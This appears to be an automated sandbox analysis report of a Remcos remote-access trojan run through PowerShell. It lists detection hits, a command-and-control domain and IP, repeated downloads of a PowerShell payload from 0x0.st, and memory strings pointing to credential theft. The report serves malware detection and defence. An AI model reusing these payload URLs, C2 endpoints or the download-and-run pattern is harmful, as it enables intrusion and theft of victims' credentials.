                Source: powershell.exe, 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_2a5a79b5-8

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1663209869.0000000008A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49727 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49734 version: TLS 1.2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407EF8
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49709 -> 37.120.208.40:56379
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49713 -> 37.120.208.40:56379
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: abokirem.duckdns.org
                Connects to many ports of the same IP (likely port scanning)
                Source: global trafficTCP traffic: 37.120.208.40 ports 56379,3,5,6,7,9
                Uses dynamic DNS services
                Source: unknownDNS query: name: abokirem.duckdns.org
                Source: global trafficTCP traffic: 192.168.2.9:49709 -> 37.120.208.40:56379
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 37.120.208.40 37.120.208.40
                Source: Joe Sandbox ViewIP Address: 168.119.145.117 168.119.145.117
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.9:49715 -> 178.237.33.50:80
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49728 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49708 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49732 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49725 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49729 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49710 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49724 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49722 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49718 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49734 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49719 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49730 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49721 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49717 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49727 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49726 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49731 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49723 -> 168.119.145.117:443
                Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.9:49733 -> 168.119.145.117:443
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /8KuV.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 0x0.stConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: powershell.exe, 0000000D.00000002.1699267968.00000000030C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: powershell.exe, 0000000D.00000002.1699267968.00000000030C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 00000011.00000002.1693956126.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: powershell.exe, 00000011.00000002.1693956126.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: powershell.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: powershell.exe, 0000000D.00000002.1698027984.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: powershell.exe, 0000000D.00000002.1698027984.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: 0x0.st
                Source: global trafficDNS traffic detected: DNS query: abokirem.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000016.00000002.1812266786.0000000006DB3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2488709838.0000000007606000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2973657147.0000000007260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: powershell.exe, 0000002C.00000002.2488709838.0000000007606000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro9
                Source: powershell.exe, 00000037.00000002.2979667593.00000000072DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microJ
                Source: powershell.exe, 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1663209869.0000000008A70000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1821567285.00000000085CC000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000001B.00000002.1976169580.00000000095AC000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000022.00000002.2153331440.000000000930C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000027.00000002.2318491679.000000000916C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000002C.00000002.2531189391.0000000008E9C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000031.00000002.2795920672.0000000008B1C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000003C.00000002.3350777711.0000000008C8C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000041.00000002.3951857716.00000000095DC000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: powershell.exe, 0000000A.00000002.1642045536.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 0000000A.00000002.1637213634.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1636433661.0000000000B1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 0000000A.00000002.1637213634.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1769697308.0000000004445000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1902212702.0000000005015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2049964859.0000000005455000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2186795010.0000000005215000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2361040368.0000000004EB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2512716697.0000000004B3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2650095673.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.2852878348.0000000004D3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.3023708129.0000000004FAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.3169331212.0000000004905000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 0000000A.00000002.1637213634.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1636433661.0000000000B1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000011.00000002.1693956126.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: powershell.exe, 00000011.00000002.1693956126.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: powershell.exe, 00000011.00000002.1693956126.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: powershell.exe, 00000011.00000002.1693956126.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: powershell.exe, 0000000A.00000002.1661001486.0000000008260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                Source: powershell.exe, 00000016.00000002.1812266786.0000000006DB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.t1
                Source: powershell.exe, 0000000D.00000002.1698679137.0000000002C64000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: powershell.exe, 00000011.00000002.1693956126.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: powershell.exe, 0000000A.00000002.1637213634.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1769697308.0000000004595000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1902212702.0000000005164000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2049964859.00000000055A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2186795010.0000000005364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2361040368.0000000005004000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2512716697.0000000004C84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2650095673.0000000004C34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.2852878348.0000000004E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.3023708129.00000000050F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.3169331212.0000000004A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0x0.st
                Source: powershell.exe, 00000046.00000002.3169331212.0000000004A54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0x0.st/8KuV.ps1
                Source: powershell.exe, 00000016.00000002.1812266786.0000000006D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://0x0.st/8KuV.ps1l?
                Source: powershell.exe, 0000000A.00000002.1637213634.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1769697308.0000000004445000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1902212702.0000000005015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2049964859.0000000005455000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2186795010.0000000005215000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2361040368.0000000004EB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2512716697.0000000004B3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2650095673.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.2852878348.0000000004D3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.3023708129.0000000004FAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.3169331212.0000000004905000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 0000000A.00000002.1642045536.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000A.00000002.1642045536.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000A.00000002.1642045536.0000000005A4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 0000000A.00000002.1637213634.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1636433661.0000000000B1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 0000000D.00000002.1699411803.000000000310C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1699267968.00000000030C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: powershell.exe, 0000000D.00000002.1699411803.000000000310C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: powershell.exe, 0000000D.00000002.1699411803.000000000310C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: powershell.exeString found in binary or memory: https://login.yahoo.com/config/login
